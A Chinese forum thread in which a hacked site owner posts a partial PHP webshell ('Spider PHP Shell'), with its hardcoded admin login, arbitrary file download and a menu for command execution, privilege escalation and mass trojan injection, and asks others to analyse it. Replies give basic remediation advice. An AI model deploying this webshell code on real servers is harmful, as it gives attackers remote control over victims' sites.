最近又被挂马,发一个木马文件大家分析一下,到底漏洞在那里。

2016-07-07 15:22 来源:www.chinab4c.com 作者:ecshop专家

[code]<?php
error_reporting(7);
ob_start();
$user="21232f297a57a5a743894a0e4a801fc3"; //32位md5加密,默认用户为admin
$pass="21232f297a57a5a743894a0e4a801fc3"; //32位md5加密,默认密码为admin
if (get_magic_quotes_gpc()) {
$_GET = array_stripslashes($_GET);
$_POST = array_stripslashes($_POST);
}
if($_GET['s']=='login'){
setcookie('username',md5($_POST['username']));
setcookie('password',md5($_POST['password']));
die('<meta http-equiv="refresh" content="1;URL=?s=main">');
}
if($_GET['s']=='logout'){
setcookie('username',null);
setcookie('password',null);
die('<meta http-equiv="refresh" content="1;URL=?s=">');
}
if($_COOKIE['username']!=$user || $_COOKIE['password']!=$pass){
die('<form method="post" action="?s=login"><center><br><br><br>SPS v1.0 Code By Spider. <br><br>Username: <input type="text" name="username"><br> Password: <input type="password" name="password"> <br><input type="submit" name="submit" value="login"></center></form>');
}
$paget = explode(' ', microtime());
$stime = $paget[1] + $paget[0];
$serverip=$HTTP_SERVER_VARS["REMOTE_ADDR"];
$scanip=$HTTP_POST_VARS['remoteip'];
if (!empty($_GET['fd'])) {
$fd=$_GET['fd'];
if (!@file_exists($fd)) {
echo "<script>window.alert('下载文件不存在');history.go(-1);</script>";
} else {
$fn = basename($fd);
$fn_info = explode('.', $fn);
$fe = $fn_info[count($fn_info)-1];
header('Content-type: application/x-'.$fe);
header('Content-Disposition: attachment; filename='.$fn);
header('Content-Description: PHP3 Generated Data');
@readfile($fd);
exit;
}
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>SPS v1.0</title>
</head>
<style type="text/css">
<!--
#PR {width:850px!important;width:850px}
#Pr table{border-style:solid; border-color:#000000}
td {
font-family: Arial;
font-size: 14px;
}
a:link {
color: #0000FF;
text-decoration: none;
}
a:visited {
color: #0000FF;
text-decoration: none;
}
a:hover {
color: #ff0000;
text-decoration: none;
}
-->
</STYLE>
<body bgcolor="#EDEDED" text="#000000">
<center>
<div id=PR>
<table border="0">
<td>
<div align="center">
<table width=100% border=0 cellspacing=0 cellpadding=0>
</div></td></table>
<table width="850">
<tr>
<td bgcolor="#AAAAAA">
<div align="center">
<font face=Webdings size=6><b>!</font>
<font size="5"> SPS(Spider PHP Shell)v1.0 </font><br>
■服务器IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']);?>
■运行环境: <?php echo @$_SERVER["SERVER_SOFTWARE"];?>
<br>■MySQL: <?php echo @function_exists(mysql_connect) ? "开启" : "关闭" ?>
■脚本路径: <?php echo str_replace('\\','/',__FILE__);?>
</b><br></div></td></tr></table>
<table width="850">
<tr>
<td bgcolor="#AAAAAA">
<div align="center">
【<a href="?s=main">文件管理</a>】
【<a href="?s=port">端口扫描</a>】
【<a href="?s=guama">批量挂马</a>】
【<a href="?s=sfile">文件查找</a>】
【<a href="?s=execute">执行命令</a>】
【<a href="?s=tools">提权工具</a>】
【<a href="?s=sqlexp">数据库操作</a>】
【<a href="?s=logout">退出程序</a></a>】
</div></td></tr></table>
<?php
$s = isset($_GET['s']) ? $_GET['s'] : "";//测定变量是否设定
$p = isset($_GET['p']) ? $_GET['p'] : "";
$f = isset($_GET['f']) ? $_GET['f'] : "";
$fpath = isset($_GET['path']) ? $_GET['path'] : "";
$path=str_replace('\\','/',dirname(__FILE__)).'/';
if($fpath!=""){!$path && $path = '.';$paths=str_replace('//','/',$_GET['path']);$path1=str_replace('//','/',opath($path,$paths));ofile($path1);}
switch($s){//函数调用
case "main": ofile($path);break;
case "redir": redir($p);break;
case "refile": refile($p);break;
case "upload": upload($p);break;
case "edit": edit($p,$f);break;
case "del": del($p,$f,$_GET['i']);break;
case "perms": perms($p,$f);break;
case "ref": ref($p,$f);break;
case "cfile": cfile($p,$f);break;
case "deldir": deldir($p,$f);break;
case "port": port($serverip,$scanip);break;
case "guama": guama($path);break;
case "qingma": qingma($path);break;
case "sfile": sfile($path);break;
case "execute": execute();break;
case "phpeval": phpeval();break;
case "serexp": serexp();break;
case "sqllogin": sqllogin();break;
case "sql": sql();break;
case "sqlexp": sqlexp();break;
case "tools": tools($path);break;
case "crack": crack();break;
case "phpinfo": phpinfo();break;
default: break;
}
//版权
$licensehack=array("67","111","100","101","32","98","121","32","83","112","105","100","101","114","46","32","77","97","107","101","32","105","110","32","67","104","105","110","97","46","32","81","81","56","48","57","51","55","52","51","48","46");
echo '<table width="850"><tr align="center"><td bgcolor="#6959CD"><a target="_blank" href="?s=phpinfo"><b>PHPINFO</b></a> <b>License: ';

回答:
这个是服务器漏洞或者网站程序漏洞被植入了木马后台文件,最好检查一下服务器并升级到最新版本。

服务器安全问题也要考虑

你要检查多余的文件。有可能文件名称变种了

谢谢大家的建议。
查到这个些是代码是一个叫做SPS v1.0 Code By Spider 的黑客软件。
现在更新了一些被修改的文件,但是发现基本上晚上12点左右还是会重新弹出恶意广告。
问题还是解决中。。。